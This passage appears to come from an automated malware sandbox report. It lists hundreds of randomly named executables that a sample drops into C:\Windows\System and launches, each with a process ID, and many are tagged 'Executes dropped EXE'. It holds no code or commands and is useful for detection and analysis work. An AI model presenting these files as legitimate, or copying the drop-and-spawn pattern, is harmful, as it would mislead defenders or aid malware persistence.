  - Executes dropped EXE
  PID:3952
- C:\Windows\System\xondCSw.exe
  C:\Windows\System\xondCSw.exe
  2⤵
  - Executes dropped EXE
  PID:1424
- C:\Windows\System\mIQKnew.exe
  C:\Windows\System\mIQKnew.exe
  2⤵
  - Executes dropped EXE
  PID:4912
- C:\Windows\System\SecVUgT.exe
  C:\Windows\System\SecVUgT.exe
  2⤵
  - Executes dropped EXE
  PID:3980
- C:\Windows\System\FOTDofy.exe
  C:\Windows\System\FOTDofy.exe
  2⤵
  - Executes dropped EXE
  PID:3292
- C:\Windows\System\xoBHovG.exe
  C:\Windows\System\xoBHovG.exe
  2⤵
  - Executes dropped EXE
  PID:1176
- C:\Windows\System\DyaLutD.exe
  C:\Windows\System\DyaLutD.exe
  2⤵
  - Executes dropped EXE
  PID:3624
- C:\Windows\System\QkiaTpq.exe
  C:\Windows\System\QkiaTpq.exe
  2⤵
  - Executes dropped EXE
  PID:2360
- C:\Windows\System\obhtHYv.exe
  C:\Windows\System\obhtHYv.exe
  2⤵
  - Executes dropped EXE
  PID:4476
- C:\Windows\System\ghDdXfk.exe
  C:\Windows\System\ghDdXfk.exe
  2⤵
  - Executes dropped EXE
  PID:1556
- C:\Windows\System\HdJBgBo.exe
  C:\Windows\System\HdJBgBo.exe
  2⤵
  - Executes dropped EXE
  PID:896
- C:\Windows\System\UrxlAAO.exe
  C:\Windows\System\UrxlAAO.exe
  2⤵
  - Executes dropped EXE
  PID:2864
- C:\Windows\System\pzOiuOf.exe
  C:\Windows\System\pzOiuOf.exe
  2⤵
  - Executes dropped EXE
  PID:2204
- C:\Windows\System\GOOkynJ.exe
  C:\Windows\System\GOOkynJ.exe
  2⤵
  - Executes dropped EXE
  PID:2004
- C:\Windows\System\qSphdAv.exe
  C:\Windows\System\qSphdAv.exe
  2⤵
  - Executes dropped EXE
  PID:1552
- C:\Windows\System\sXBPMvF.exe
  C:\Windows\System\sXBPMvF.exe
  2⤵
  - Executes dropped EXE
  PID:4140
- C:\Windows\System\PlUgdFU.exe
  C:\Windows\System\PlUgdFU.exe
  2⤵
  - Executes dropped EXE
  PID:1344
- C:\Windows\System\BVTsULb.exe
  C:\Windows\System\BVTsULb.exe
  2⤵
  - Executes dropped EXE
  PID:2892
- C:\Windows\System\jpNyvrx.exe
  C:\Windows\System\jpNyvrx.exe
  2⤵
  - Executes dropped EXE
  PID:3820
- C:\Windows\System\BlnxPqO.exe
  C:\Windows\System\BlnxPqO.exe
  2⤵
  - Executes dropped EXE
  PID:3092
- C:\Windows\System\BMJsSfd.exe
  C:\Windows\System\BMJsSfd.exe
  2⤵
  - Executes dropped EXE
  PID:2188
- C:\Windows\System\UQwhebS.exe
  C:\Windows\System\UQwhebS.exe
  2⤵
  - Executes dropped EXE
  PID:4380
- C:\Windows\System\BXLXdIJ.exe
  C:\Windows\System\BXLXdIJ.exe
  2⤵
  - Executes dropped EXE
  PID:3508
- C:\Windows\System\pthXGLz.exe
  C:\Windows\System\pthXGLz.exe
  2⤵
  - Executes dropped EXE
  PID:2860
- C:\Windows\System\ARwElTn.exe
  C:\Windows\System\ARwElTn.exe
  2⤵
  - Executes dropped EXE
  PID:1748
- C:\Windows\System\cLIQvQW.exe
  C:\Windows\System\cLIQvQW.exe
  2⤵
  - Executes dropped EXE
  PID:4844
- C:\Windows\System\RGLrBBT.exe
  C:\Windows\System\RGLrBBT.exe
  2⤵
  - Executes dropped EXE
  PID:4024
- C:\Windows\System\UOOAuVx.exe
  C:\Windows\System\UOOAuVx.exe
  2⤵
  - Executes dropped EXE
  PID:3840
- C:\Windows\System\PGduiUv.exe
  C:\Windows\System\PGduiUv.exe
  2⤵
  - Executes dropped EXE
  PID:4600
- C:\Windows\System\xesnnza.exe
  C:\Windows\System\xesnnza.exe
  2⤵
  - Executes dropped EXE
  PID:700
- C:\Windows\System\XLxamgg.exe
  C:\Windows\System\XLxamgg.exe
  2⤵
  - Executes dropped EXE
  PID:3244
- C:\Windows\System\YVVoTQB.exe
  C:\Windows\System\YVVoTQB.exe
  2⤵
  - Executes dropped EXE
  PID:1016
- C:\Windows\System\KUOIgOv.exe
  C:\Windows\System\KUOIgOv.exe
  2⤵
  - Executes dropped EXE
  PID:2372
- C:\Windows\System\wTiOONb.exe
  C:\Windows\System\wTiOONb.exe
  2⤵
  - Executes dropped EXE
  PID:1316
- C:\Windows\System\TejqWML.exe
  C:\Windows\System\TejqWML.exe
  2⤵
  - Executes dropped EXE
  PID:4212
- C:\Windows\System\PobGJVT.exe
  C:\Windows\System\PobGJVT.exe
  2⤵
  - Executes dropped EXE
  PID:1192
- C:\Windows\System\rhbfUyq.exe
  C:\Windows\System\rhbfUyq.exe
  2⤵
  - Executes dropped EXE
  PID:3784
- C:\Windows\System\DnguoFi.exe
  C:\Windows\System\DnguoFi.exe
  2⤵
  - Executes dropped EXE
  PID:1044
- C:\Windows\System\tcYIePy.exe
  C:\Windows\System\tcYIePy.exe
  2⤵
  - Executes dropped EXE
  PID:2944
- C:\Windows\System\ArIMAZd.exe
  C:\Windows\System\ArIMAZd.exe
  2⤵
  - Executes dropped EXE
  PID:4092
- C:\Windows\System\DvQvZID.exe
  C:\Windows\System\DvQvZID.exe
  2⤵
  - Executes dropped EXE
  PID:4472
- C:\Windows\System\pPrmhsU.exe
  C:\Windows\System\pPrmhsU.exe
  2⤵
  - Executes dropped EXE
  PID:2452
- C:\Windows\System\nQLfSNo.exe
  C:\Windows\System\nQLfSNo.exe
  2⤵
  - Executes dropped EXE
  PID:4304
- C:\Windows\System\AAqVrXP.exe
  C:\Windows\System\AAqVrXP.exe
  2⤵
  - Executes dropped EXE
  PID:3644
- C:\Windows\System\uaEhgkN.exe
  C:\Windows\System\uaEhgkN.exe
  2⤵
  - Executes dropped EXE
  PID:3492
- C:\Windows\System\mludFFQ.exe
  C:\Windows\System\mludFFQ.exe
  2⤵
  - Executes dropped EXE
  PID:1936
- C:\Windows\System\zByGXlc.exe
  C:\Windows\System\zByGXlc.exe
  2⤵
  - Executes dropped EXE
  PID:1032
- C:\Windows\System\kZYrbiM.exe
  C:\Windows\System\kZYrbiM.exe
  2⤵
  - Executes dropped EXE
  PID:4292
- C:\Windows\System\UiKDLix.exe
  C:\Windows\System\UiKDLix.exe
  2⤵
  - Executes dropped EXE
  PID:744
- C:\Windows\System\mmvrZZs.exe
  C:\Windows\System\mmvrZZs.exe
  2⤵
  - Executes dropped EXE
  PID:4184
- C:\Windows\System\qaWMlqm.exe
  C:\Windows\System\qaWMlqm.exe
  2⤵
  - Executes dropped EXE
  PID:3280
- C:\Windows\System\qodLBuo.exe
  C:\Windows\System\qodLBuo.exe
  2⤵
  - Executes dropped EXE
  PID:1828
- C:\Windows\System\yHXJZrP.exe
  C:\Windows\System\yHXJZrP.exe
  2⤵
  - Executes dropped EXE
  PID:1848
- C:\Windows\System\UeZuiFw.exe
  C:\Windows\System\UeZuiFw.exe
  2⤵
  - Executes dropped EXE
  PID:3652
- C:\Windows\System\vLDaXpG.exe
  C:\Windows\System\vLDaXpG.exe
  2⤵
  - Executes dropped EXE
  PID:1140
- C:\Windows\System\cOTARmX.exe
  C:\Windows\System\cOTARmX.exe
  2⤵
  - Executes dropped EXE
  PID:332
- C:\Windows\System\YOURaRs.exe
  C:\Windows\System\YOURaRs.exe
  2⤵
  - Executes dropped EXE
  PID:4220
- C:\Windows\System\eTTjgUy.exe
  C:\Windows\System\eTTjgUy.exe
  2⤵
  - Executes dropped EXE
  PID:3896
- C:\Windows\System\fogIgZm.exe
  C:\Windows\System\fogIgZm.exe
  2⤵
  PID:2448
- C:\Windows\System\YdSrnIJ.exe
  C:\Windows\System\YdSrnIJ.exe
  2⤵
  PID:4520
- C:\Windows\System\DLVgCBw.exe
  C:\Windows\System\DLVgCBw.exe
  2⤵
  PID:972
- C:\Windows\System\mZpKRMT.exe
  C:\Windows\System\mZpKRMT.exe
  2⤵
  PID:4016
- C:\Windows\System\SJHpIxL.exe
  C:\Windows\System\SJHpIxL.exe
  2⤵
  PID:4888
- C:\Windows\System\GRfrCab.exe
  C:\Windows\System\GRfrCab.exe
  2⤵
  PID:4336
- C:\Windows\System\OoARitY.exe
  C:\Windows\System\OoARitY.exe
  2⤵
  PID:3976
- C:\Windows\System\wkXBIBi.exe
  C:\Windows\System\wkXBIBi.exe
  2⤵
  PID:3212
- C:\Windows\System\JEbSxZn.exe
  C:\Windows\System\JEbSxZn.exe
  2⤵
  PID:4488
- C:\Windows\System\QMwNLEU.exe
  C:\Windows\System\QMwNLEU.exe
  2⤵
  PID:3220
- C:\Windows\System\EciokLu.exe
  C:\Windows\System\EciokLu.exe
  2⤵
  PID:2940
- C:\Windows\System\QfezKDS.exe
  C:\Windows\System\QfezKDS.exe
  2⤵
  PID:868
- C:\Windows\System\DHwGvBC.exe
  C:\Windows\System\DHwGvBC.exe
  2⤵
  PID:5128
- C:\Windows\System\FPyqeEi.exe
  C:\Windows\System\FPyqeEi.exe
  2⤵
  PID:5168
- C:\Windows\System\bIRbgPh.exe
  C:\Windows\System\bIRbgPh.exe
  2⤵
  PID:5204
- C:\Windows\System\HAMpoJb.exe
  C:\Windows\System\HAMpoJb.exe
  2⤵
  PID:5228
- C:\Windows\System\sVnBthH.exe
  C:\Windows\System\sVnBthH.exe
  2⤵
  PID:5264
- C:\Windows\System\VfNAsXQ.exe
  C:\Windows\System\VfNAsXQ.exe
  2⤵
  PID:5292
- C:\Windows\System\sIVoxXr.exe
  C:\Windows\System\sIVoxXr.exe
  2⤵
  PID:5324
- C:\Windows\System\PYsTZzt.exe
  C:\Windows\System\PYsTZzt.exe
  2⤵
  PID:5360
- C:\Windows\System\NdppOrw.exe
  C:\Windows\System\NdppOrw.exe
  2⤵
  PID:5392
- C:\Windows\System\WfaUvMy.exe
  C:\Windows\System\WfaUvMy.exe
  2⤵
  PID:5424
- C:\Windows\System\VNCZdoN.exe
  C:\Windows\System\VNCZdoN.exe
  2⤵
  PID:5456
- C:\Windows\System\kwBfKzD.exe
  C:\Windows\System\kwBfKzD.exe
  2⤵
  PID:5488
- C:\Windows\System\bdPrilj.exe
  C:\Windows\System\bdPrilj.exe
  2⤵
  PID:5520
- C:\Windows\System\piOgTcu.exe
  C:\Windows\System\piOgTcu.exe
  2⤵
  PID:5560
- C:\Windows\System\RZKYQUQ.exe
  C:\Windows\System\RZKYQUQ.exe
  2⤵
  PID:5588
- C:\Windows\System\ofoOmqd.exe
  C:\Windows\System\ofoOmqd.exe
  2⤵
  PID:5620
- C:\Windows\System\PvKMjUC.exe
  C:\Windows\System\PvKMjUC.exe
  2⤵
  PID:5652
- C:\Windows\System\WMLLapm.exe
  C:\Windows\System\WMLLapm.exe
  2⤵
  PID:5676
- C:\Windows\System\natNqEW.exe
  C:\Windows\System\natNqEW.exe
  2⤵
  PID:5692
- C:\Windows\System\nfaSMOm.exe
  C:\Windows\System\nfaSMOm.exe
  2⤵
  PID:5776
- C:\Windows\System\EYZBeVO.exe
  C:\Windows\System\EYZBeVO.exe
  2⤵
  PID:5804
- C:\Windows\System\URGXdWv.exe
  C:\Windows\System\URGXdWv.exe
  2⤵
  PID:5844
- C:\Windows\System\WdOjiZK.exe
  C:\Windows\System\WdOjiZK.exe
  2⤵
  PID:5872
- C:\Windows\System\arfhqmJ.exe
  C:\Windows\System\arfhqmJ.exe
  2⤵
  PID:5920
- C:\Windows\System\wKFUhlx.exe
  C:\Windows\System\wKFUhlx.exe
  2⤵
  PID:5964
- C:\Windows\System\YHeiFmu.exe
  C:\Windows\System\YHeiFmu.exe
  2⤵
  PID:6012
- C:\Windows\System\ESZEmbF.exe
  C:\Windows\System\ESZEmbF.exe
  2⤵
  PID:6056
- C:\Windows\System\VJbAsXL.exe
  C:\Windows\System\VJbAsXL.exe
  2⤵
  PID:6096
- C:\Windows\System\vpwWFDl.exe
  C:\Windows\System\vpwWFDl.exe
  2⤵
  PID:6128
- C:\Windows\System\muCOGPN.exe
  C:\Windows\System\muCOGPN.exe
  2⤵
  PID:5160
- C:\Windows\System\ryBsryK.exe
  C:\Windows\System\ryBsryK.exe
  2⤵
  PID:5260
- C:\Windows\System\DFEqXOK.exe
  C:\Windows\System\DFEqXOK.exe
  2⤵
  PID:5316
- C:\Windows\System\dkYOXSD.exe
  C:\Windows\System\dkYOXSD.exe
  2⤵
  PID:5356
- C:\Windows\System\FSGPIkZ.exe
  C:\Windows\System\FSGPIkZ.exe
  2⤵
  PID:5400
- C:\Windows\System\PhgrNRb.exe
  C:\Windows\System\PhgrNRb.exe
  2⤵
  PID:5476
- C:\Windows\System\NygvwHA.exe
  C:\Windows\System\NygvwHA.exe
  2⤵
  PID:5576
- C:\Windows\System\FpiQzvV.exe
  C:\Windows\System\FpiQzvV.exe
  2⤵
  PID:5684
- C:\Windows\System\spgGscE.exe
  C:\Windows\System\spgGscE.exe
  2⤵
  PID:5736
- C:\Windows\System\rFRjzTt.exe
  C:\Windows\System\rFRjzTt.exe
  2⤵
  PID:5816
- C:\Windows\System\VfAhLUW.exe
  C:\Windows\System\VfAhLUW.exe
  2⤵
  PID:1456
- C:\Windows\System\XoSSxRf.exe
  C:\Windows\System\XoSSxRf.exe
  2⤵
  PID:5928
- C:\Windows\System\VeOpxNU.exe
  C:\Windows\System\VeOpxNU.exe
  2⤵
  PID:6028
- C:\Windows\System\nRzsHNe.exe
  C:\Windows\System\nRzsHNe.exe
  2⤵
  PID:6116
- C:\Windows\System\lqXQcbv.exe
  C:\Windows\System\lqXQcbv.exe
  2⤵
  PID:5188
- C:\Windows\System\uyWIKso.exe
  C:\Windows\System\uyWIKso.exe
  2⤵
  PID:684
- C:\Windows\System\bRLmwoV.exe
  C:\Windows\System\bRLmwoV.exe
  2⤵
  PID:5472
- C:\Windows\System\MYYdtxj.exe
  C:\Windows\System\MYYdtxj.exe
  2⤵
  PID:5616
- C:\Windows\System\IUserFf.exe
  C:\Windows\System\IUserFf.exe
  2⤵
  PID:5712
- C:\Windows\System\sNRCglK.exe
  C:\Windows\System\sNRCglK.exe
  2⤵
  PID:5860
- C:\Windows\System\qxAUjkO.exe
  C:\Windows\System\qxAUjkO.exe
  2⤵
  PID:5944
- C:\Windows\System\lgudSIC.exe
  C:\Windows\System\lgudSIC.exe
  2⤵
  PID:5148
- C:\Windows\System\OXJZzbX.exe
  C:\Windows\System\OXJZzbX.exe
  2⤵
  PID:4064
- C:\Windows\System\EaHMHvq.exe
  C:\Windows\System\EaHMHvq.exe
  2⤵
  PID:4440
- C:\Windows\System\wWMVrIW.exe
  C:\Windows\System\wWMVrIW.exe
  2⤵
  PID:4828
- C:\Windows\System\dcMnSpq.exe
  C:\Windows\System\dcMnSpq.exe
  2⤵
  PID:6148
- C:\Windows\System\ZvZuvsH.exe
  C:\Windows\System\ZvZuvsH.exe
  2⤵
  PID:6164
- C:\Windows\System\obicFDV.exe
  C:\Windows\System\obicFDV.exe
  2⤵
  PID:6204
- C:\Windows\System\NwwPIeK.exe
  C:\Windows\System\NwwPIeK.exe
  2⤵
  PID:6232
- C:\Windows\System\VqFZuxy.exe
  C:\Windows\System\VqFZuxy.exe
  2⤵
  PID:6256
- C:\Windows\System\llrCyKl.exe
  C:\Windows\System\llrCyKl.exe
  2⤵
  PID:6288
- C:\Windows\System\QOTSpgV.exe
  C:\Windows\System\QOTSpgV.exe
  2⤵
  PID:6316
- C:\Windows\System\ZKHyiuD.exe
  C:\Windows\System\ZKHyiuD.exe
  2⤵
  PID:6336
- C:\Windows\System\tVQZVAj.exe
  C:\Windows\System\tVQZVAj.exe
  2⤵
  PID:6364
- C:\Windows\System\bEpiDMq.exe
  C:\Windows\System\bEpiDMq.exe
  2⤵
  PID:6400
- C:\Windows\System\zBtrzvC.exe
  C:\Windows\System\zBtrzvC.exe
  2⤵
  PID:6424
- C:\Windows\System\VsEQPLu.exe
  C:\Windows\System\VsEQPLu.exe
  2⤵
  PID:6456
- C:\Windows\System\OPiIbaz.exe
  C:\Windows\System\OPiIbaz.exe
  2⤵
  PID:6484
- C:\Windows\System\cKdLtmn.exe
  C:\Windows\System\cKdLtmn.exe
  2⤵
  PID:6520
- C:\Windows\System\gDQxatF.exe
  C:\Windows\System\gDQxatF.exe
  2⤵
  PID:6544
- C:\Windows\System\ZWRAdXb.exe
  C:\Windows\System\ZWRAdXb.exe
  2⤵
  PID:6580
- C:\Windows\System\JVcYgGu.exe
  C:\Windows\System\JVcYgGu.exe
  2⤵
  PID:6608
- C:\Windows\System\sfXUarG.exe
  C:\Windows\System\sfXUarG.exe
  2⤵
  PID:6640
- C:\Windows\System\edVVLYc.exe
  C:\Windows\System\edVVLYc.exe
  2⤵
  PID:6676
- C:\Windows\System\ZixrZZY.exe
  C:\Windows\System\ZixrZZY.exe
  2⤵
  PID:6700
- C:\Windows\System\xYyyqEV.exe
  C:\Windows\System\xYyyqEV.exe
  2⤵
  PID:6728
- C:\Windows\System\BSeaigY.exe
  C:\Windows\System\BSeaigY.exe
  2⤵
  PID:6772
- C:\Windows\System\QAljxjo.exe
  C:\Windows\System\QAljxjo.exe
  2⤵
  PID:6800
- C:\Windows\System\fnQIpcp.exe
  C:\Windows\System\fnQIpcp.exe
  2⤵
  PID:6824
- C:\Windows\System\XVjtLzF.exe
  C:\Windows\System\XVjtLzF.exe
  2⤵
  PID:6852
- C:\Windows\System\FMRaVKL.exe
  C:\Windows\System\FMRaVKL.exe
  2⤵
  PID:6880
- C:\Windows\System\fWqzNfZ.exe
  C:\Windows\System\fWqzNfZ.exe
  2⤵
  PID:6908
- C:\Windows\System\sGbDKrd.exe
  C:\Windows\System\sGbDKrd.exe
  2⤵
  PID:6940
- C:\Windows\System\SwfKGhy.exe
  C:\Windows\System\SwfKGhy.exe
  2⤵
  PID:6964
- C:\Windows\System\IHAJhmM.exe
  C:\Windows\System\IHAJhmM.exe
  2⤵
  PID:6996
- C:\Windows\System\DHNCcBw.exe
  C:\Windows\System\DHNCcBw.exe
  2⤵
  PID:7024
- C:\Windows\System\XgOMdmq.exe
  C:\Windows\System\XgOMdmq.exe
  2⤵
  PID:7048
- C:\Windows\System\EMzZqYL.exe
  C:\Windows\System\EMzZqYL.exe
  2⤵
  PID:7080
- C:\Windows\System\nOIGkMT.exe
  C:\Windows\System\nOIGkMT.exe
  2⤵
  PID:7108
- C:\Windows\System\LQDAwzw.exe
  C:\Windows\System\LQDAwzw.exe
  2⤵
  PID:7136
- C:\Windows\System\efQcuvL.exe
  C:\Windows\System\efQcuvL.exe
  2⤵
  PID:7160
- C:\Windows\System\DLdXYnP.exe
  C:\Windows\System\DLdXYnP.exe
  2⤵
  PID:6188
- C:\Windows\System\istYWrh.exe
  C:\Windows\System\istYWrh.exe
  2⤵
  PID:6244
- C:\Windows\System\einVrOH.exe
  C:\Windows\System\einVrOH.exe
  2⤵
  PID:6328
- C:\Windows\System\AECbDOM.exe
  C:\Windows\System\AECbDOM.exe
  2⤵
  PID:6384
- C:\Windows\System\pYLLWxV.exe
  C:\Windows\System\pYLLWxV.exe
  2⤵
  PID:6440
- C:\Windows\System\SpBAJCB.exe
  C:\Windows\System\SpBAJCB.exe
  2⤵
  PID:6528
- C:\Windows\System\Esztkjj.exe
  C:\Windows\System\Esztkjj.exe
  2⤵
  PID:6596
- C:\Windows\System\qKrpfER.exe
  C:\Windows\System\qKrpfER.exe
  2⤵
  PID:6664
- C:\Windows\System\FRimHaq.exe
  C:\Windows\System\FRimHaq.exe
  2⤵
  PID:6724
- C:\Windows\System\spsdXNJ.exe
  C:\Windows\System\spsdXNJ.exe
  2⤵
  PID:6808
- C:\Windows\System\ZcMBmNh.exe
  C:\Windows\System\ZcMBmNh.exe
  2⤵
  PID:6868
- C:\Windows\System\sedxdES.exe
  C:\Windows\System\sedxdES.exe
  2⤵
  PID:6948
- C:\Windows\System\ApqZndS.exe
  C:\Windows\System\ApqZndS.exe
  2⤵
  PID:6984
- C:\Windows\System\NMtAziA.exe
  C:\Windows\System\NMtAziA.exe
  2⤵
  PID:7044
- C:\Windows\System\CkaDJjv.exe
  C:\Windows\System\CkaDJjv.exe
  2⤵
  PID:7120
- C:\Windows\System\XGyCDVb.exe
  C:\Windows\System\XGyCDVb.exe
  2⤵
  PID:6216
- C:\Windows\System\fKmDqAq.exe
  C:\Windows\System\fKmDqAq.exe
  2⤵
  PID:6348
- C:\Windows\System\KHWpwoP.exe
  C:\Windows\System\KHWpwoP.exe
  2⤵
  PID:6536
- C:\Windows\System\vrocGWN.exe
  C:\Windows\System\vrocGWN.exe
  2⤵
  PID:6708
- C:\Windows\System\KKSLgxs.exe
  C:\Windows\System\KKSLgxs.exe
  2⤵
  PID:6888
- C:\Windows\System\QUlrjmx.exe
  C:\Windows\System\QUlrjmx.exe
  2⤵
  PID:7032
- C:\Windows\System\lgwxbxZ.exe
  C:\Windows\System\lgwxbxZ.exe
  2⤵
  PID:7156
- C:\Windows\System\Ibyornn.exe
  C:\Windows\System\Ibyornn.exe
  2⤵
  PID:6576
- C:\Windows\System\gRvfTWx.exe
  C:\Windows\System\gRvfTWx.exe
  2⤵
  PID:6916
- C:\Windows\System\eYFTifL.exe
  C:\Windows\System\eYFTifL.exe
  2⤵
  PID:6360
- C:\Windows\System\hDSJWUC.exe
  C:\Windows\System\hDSJWUC.exe
  2⤵
  PID:6784
- C:\Windows\System\FnrzhNS.exe
  C:\Windows\System\FnrzhNS.exe
  2⤵
  PID:7192
- C:\Windows\System\inpwHPY.exe
  C:\Windows\System\inpwHPY.exe
  2⤵
  PID:7216
- C:\Windows\System\yFGYjPp.exe
  C:\Windows\System\yFGYjPp.exe
  2⤵
  PID:7244
- C:\Windows\System\lDPxkBD.exe
  C:\Windows\System\lDPxkBD.exe
  2⤵
  PID:7276
- C:\Windows\System\ZChYqiU.exe
  C:\Windows\System\ZChYqiU.exe
  2⤵
  PID:7300
- C:\Windows\System\BlvPMpN.exe
  C:\Windows\System\BlvPMpN.exe
  2⤵
  PID:7328
- C:\Windows\System\YyhPlxE.exe
  C:\Windows\System\YyhPlxE.exe
  2⤵
  PID:7364
- C:\Windows\System\UCehBhB.exe
  C:\Windows\System\UCehBhB.exe
  2⤵
  PID:7396
- C:\Windows\System\cSFcdWP.exe
  C:\Windows\System\cSFcdWP.exe
  2⤵
  PID:7424
- C:\Windows\System\QMCAyKo.exe
  C:\Windows\System\QMCAyKo.exe
  2⤵
  PID:7452
- C:\Windows\System\YHGgbwO.exe
  C:\Windows\System\YHGgbwO.exe
  2⤵
  PID:7480
- C:\Windows\System\MrNQbVh.exe
  C:\Windows\System\MrNQbVh.exe
  2⤵
  PID:7516
- C:\Windows\System\xzORxvg.exe
  C:\Windows\System\xzORxvg.exe
  2⤵
  PID:7540
- C:\Windows\System\zfDejqS.exe
  C:\Windows\System\zfDejqS.exe
  2⤵
  PID:7568
- C:\Windows\System\pwJAJZQ.exe
  C:\Windows\System\pwJAJZQ.exe
  2⤵
  PID:7608
- C:\Windows\System\lKFVuod.exe
  C:\Windows\System\lKFVuod.exe
  2⤵
  PID:7636
- C:\Windows\System\SzmzcpP.exe
  C:\Windows\System\SzmzcpP.exe
  2⤵
  PID:7660
- C:\Windows\System\ANlFnaY.exe
  C:\Windows\System\ANlFnaY.exe
  2⤵
  PID:7688
- C:\Windows\System\BXCpkaS.exe
  C:\Windows\System\BXCpkaS.exe
  2⤵
  PID:7720
- C:\Windows\System\SdkBmgl.exe
  C:\Windows\System\SdkBmgl.exe
  2⤵
  PID:7744
- C:\Windows\System\HBVrAvE.exe
  C:\Windows\System\HBVrAvE.exe
  2⤵
  PID:7776
- C:\Windows\System\dGdCuLc.exe
  C:\Windows\System\dGdCuLc.exe
  2⤵
  PID:7808
- C:\Windows\System\NQQNvny.exe
  C:\Windows\System\NQQNvny.exe
  2⤵
  PID:7836
- C:\Windows\System\ZNbeiLz.exe
  C:\Windows\System\ZNbeiLz.exe
  2⤵
  PID:7860
- C:\Windows\System\dkCuSlN.exe
  C:\Windows\System\dkCuSlN.exe
  2⤵
  PID:7888
- C:\Windows\System\QQPSaBF.exe
  C:\Windows\System\QQPSaBF.exe
  2⤵
  PID:7924
- C:\Windows\System\ZqwvHlX.exe
  C:\Windows\System\ZqwvHlX.exe
  2⤵
  PID:7948
- C:\Windows\System\iUIgWuh.exe
  C:\Windows\System\iUIgWuh.exe
  2⤵
  PID:7988
- C:\Windows\System\qCdjPIB.exe
  C:\Windows\System\qCdjPIB.exe
  2⤵
  PID:8012
- C:\Windows\System\eSZprWM.exe
  C:\Windows\System\eSZprWM.exe
  2⤵
  PID:8036
- C:\Windows\System\qxYCVOR.exe
  C:\Windows\System\qxYCVOR.exe
  2⤵
  PID:8068
- C:\Windows\System\ojZRXMk.exe
  C:\Windows\System\ojZRXMk.exe
  2⤵
  PID:8092
- C:\Windows\System\qlCvyVq.exe
  C:\Windows\System\qlCvyVq.exe
  2⤵
  PID:8124
- C:\Windows\System\gMFFKzo.exe
  C:\Windows\System\gMFFKzo.exe
  2⤵
  PID:8148
- C:\Windows\System\AwHorKV.exe
  C:\Windows\System\AwHorKV.exe
  2⤵
  PID:8180
- C:\Windows\System\Knqvobs.exe
  C:\Windows\System\Knqvobs.exe
  2⤵
  PID:7208
- C:\Windows\System\lPGJAIo.exe
  C:\Windows\System\lPGJAIo.exe
  2⤵
  PID:7324
- C:\Windows\System\fdTotJk.exe
  C:\Windows\System\fdTotJk.exe
  2⤵
  PID:7408
- C:\Windows\System\OaXdYnw.exe
  C:\Windows\System\OaXdYnw.exe
  2⤵
  PID:7444
- C:\Windows\System\JXyRWVN.exe
  C:\Windows\System\JXyRWVN.exe
  2⤵
  PID:7532
- C:\Windows\System\LOQXzZt.exe
  C:\Windows\System\LOQXzZt.exe
  2⤵
  PID:7624
- C:\Windows\System\lWBuZna.exe
  C:\Windows\System\lWBuZna.exe
  2⤵
  PID:7652
- C:\Windows\System\yRtmmuZ.exe
  C:\Windows\System\yRtmmuZ.exe
  2⤵
  PID:7728
- C:\Windows\System\jXByezs.exe
  C:\Windows\System\jXByezs.exe
  2⤵
  PID:7796
- C:\Windows\System\KTqKyfD.exe
  C:\Windows\System\KTqKyfD.exe
  2⤵
  PID:7852
- C:\Windows\System\gwpnILI.exe
  C:\Windows\System\gwpnILI.exe
  2⤵
  PID:7940
- C:\Windows\System\PsunYrJ.exe
  C:\Windows\System\PsunYrJ.exe
  2⤵
  PID:8004
- C:\Windows\System\igsYHUo.exe
  C:\Windows\System\igsYHUo.exe
  2⤵
  PID:8056
- C:\Windows\System\IOaWgjB.exe
  C:\Windows\System\IOaWgjB.exe
  2⤵
  PID:8132
- C:\Windows\System\iLTZXCS.exe
  C:\Windows\System\iLTZXCS.exe
  2⤵
  PID:7264
- C:\Windows\System\rQSEHpN.exe
  C:\Windows\System\rQSEHpN.exe
  2⤵
  PID:7436
- C:\Windows\System\pGKGmdS.exe
  C:\Windows\System\pGKGmdS.exe
  2⤵
  PID:7596
- C:\Windows\System\ojdRhEB.exe
  C:\Windows\System\ojdRhEB.exe
  2⤵
  PID:7708
- C:\Windows\System\lPbfTEp.exe
  C:\Windows\System\lPbfTEp.exe
  2⤵
  PID:7828
- C:\Windows\System\fRPmIkT.exe
  C:\Windows\System\fRPmIkT.exe
  2⤵
  PID:7996
- C:\Windows\System\tUptwKJ.exe
  C:\Windows\System\tUptwKJ.exe
  2⤵
  PID:8160
- C:\Windows\System\xDjPMMl.exe
  C:\Windows\System\xDjPMMl.exe
  2⤵
  PID:7524
- C:\Windows\System\krThscl.exe
  C:\Windows\System\krThscl.exe
  2⤵
  PID:7816
- C:\Windows\System\Oltutko.exe
  C:\Windows\System\Oltutko.exe
  2⤵
  PID:7292
- C:\Windows\System\vvmrBVf.exe
  C:\Windows\System\vvmrBVf.exe
  2⤵
  PID:7972
- C:\Windows\System\OtauCKP.exe
  C:\Windows\System\OtauCKP.exe
  2⤵
  PID:7576
- C:\Windows\System\jwrRaNz.exe
  C:\Windows\System\jwrRaNz.exe
  2⤵
  PID:8212
- C:\Windows\System\AFWJnqw.exe
  C:\Windows\System\AFWJnqw.exe
  2⤵
  PID:8240
- C:\Windows\System\ajPdejS.exe
  C:\Windows\System\ajPdejS.exe
  2⤵
  PID:8272
- C:\Windows\System\LmxJijW.exe
  C:\Windows\System\LmxJijW.exe
  2⤵
  PID:8304
- C:\Windows\System\bduwQbg.exe
  C:\Windows\System\bduwQbg.exe
  2⤵
  PID:8332
- C:\Windows\System\SvBWMUn.exe
  C:\Windows\System\SvBWMUn.exe
  2⤵
  PID:8368
- C:\Windows\System\dRCjQKr.exe
  C:\Windows\System\dRCjQKr.exe
  2⤵
  PID:8384
- C:\Windows\System\MYrKhYF.exe
  C:\Windows\System\MYrKhYF.exe
  2⤵
  PID:8420
- C:\Windows\System\ZQchaFU.exe
  C:\Windows\System\ZQchaFU.exe
  2⤵
  PID:8464
- C:\Windows\System\LkKxSCR.exe
  C:\Windows\System\LkKxSCR.exe
  2⤵
  PID:8500
- C:\Windows\System\OvQAMWr.exe
  C:\Windows\System\OvQAMWr.exe
  2⤵
  PID:8532
- C:\Windows\System\JJZiOxR.exe
  C:\Windows\System\JJZiOxR.exe
  2⤵
  PID:8564
- C:\Windows\System\GWdnaZy.exe
  C:\Windows\System\GWdnaZy.exe
  2⤵
  PID:8596
- C:\Windows\System\HoEYJSL.exe
  C:\Windows\System\HoEYJSL.exe
  2⤵
  PID:8624
- C:\Windows\System\AokdFaD.exe
  C:\Windows\System\AokdFaD.exe
  2⤵
  PID:8656
- C:\Windows\System\StDEndA.exe
  C:\Windows\System\StDEndA.exe
  2⤵
  PID:8684
- C:\Windows\System\VVYLOKt.exe
  C:\Windows\System\VVYLOKt.exe
  2⤵
  PID:8716
- C:\Windows\System\SYVnRJl.exe
